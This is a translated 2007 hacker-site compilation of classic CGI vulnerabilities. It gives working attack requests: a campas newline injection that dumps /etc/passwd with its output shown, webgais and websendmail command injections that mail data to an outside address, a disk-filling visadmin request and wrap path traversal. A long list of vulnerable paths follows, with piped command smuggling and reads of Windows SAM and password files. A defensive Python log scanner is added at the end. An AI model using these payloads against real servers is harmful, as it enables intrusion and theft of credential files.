A Collection of Classic CGI Vulnerabilities
Compiled and published by: 黑客风云  Source: www.05112.com  Updated: 2007-6-18

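27. backdoor
Some current versions of cgichk.c now check for the trojans unlg1.1 and rwwwshell.pl.
The former was written by UnlG, and I have not seen its source; the other was written by THC, and packetstorm has the source of its version 1.6.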

28. visadmin.exe
http://omni.server/cgi-bin/visadmin.exe?user=guest
This request makes the server write to its hard disk continuously until the disk is full.

29. campas
> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... You know what to do next, right? :P

30. webgais
query=';mail+foo@somewhere.net
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@pop3.kappa.roparagraph
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a

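31. wrap
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
Lists the files in the etc directory.
Below are all the CGI program names that may contain vulnerabilities. More vulnerabilities are still being collected and organized, and your criticism and guidance are sincerely welcome.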
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SelectOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
adminlogin?RCpage=/sysadmin/index.stm
/c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SelectOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../
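
An added example, not part of the original article: a log check a site administrator could run to find requests matching the patterns shown above (the encoded newline in the campas request, the /../ traversal in the wrap request, and list entries containing ::$DATA or |). The sample log lines, the function names and the short LEGACY_CGI subset are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Common Log Format; addresses and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Jun/2007:10:00:01 +0800] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 200 512
192.0.2.11 - - [18/Jun/2007:10:00:05 +0800] "GET /cgi-bin/wrap?/../../../../../etc HTTP/1.0" 200 2048
192.0.2.12 - - [18/Jun/2007:10:00:09 +0800] "GET /index.asp::$DATA HTTP/1.0" 404 0
192.0.2.13 - - [18/Jun/2007:10:00:12 +0800] "GET /cgi-bin/Count.cgi?df=home.dat HTTP/1.0" 200 90
192.0.2.14 - - [18/Jun/2007:10:00:20 +0800] "GET /index.html HTTP/1.0" 200 1024
"""

# Captures: client address, request target, response status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

# A few program names from the list above (assumption: extend to the full list).
LEGACY_CGI = {"campas", "wrap", "phf", "count.cgi", "webgais", "websendmail",
              "whois_raw.cgi", "visadmin.exe"}

def classify(target):
    """Return sorted reasons why a request target matches a pattern from the article."""
    path, _, query = target.partition("?")
    path, query = unquote(path), unquote(query)   # decode %0a, %20, ... before matching
    reasons = set()
    if "\n" in query or "\r" in query:
        reasons.add("newline-in-query")      # campas, whois_raw.cgi
    if ".." in (path + "/" + query).replace("\\", "/").split("/"):
        reasons.add("path-traversal")        # wrap, pfdispaly.cgi
    if "|" in path + query:
        reasons.add("pipe-in-request")       # input.bat, get32.exe
    if path.lower().endswith("::$data"):
        reasons.add("ntfs-stream-suffix")    # index.asp::$DATA
    if path.rsplit("/", 1)[-1].lower() in LEGACY_CGI:
        reasons.add("legacy-cgi-name")
    return sorted(reasons)

def scan(log_text):
    """Return (client, status, target, reasons) for every flagged log line."""
    hits = []
    for m in filter(None, map(REQUEST.match, log_text.splitlines())):
        client, target, status = m.groups()
        reasons = classify(target)
        if reasons:
            hits.append((client, int(status), target, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request answered with status 200 deserves a closer look than one answered with 404, since it means the program exists on the server.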

Entered by: cainiaowang    Editor: cainiaowang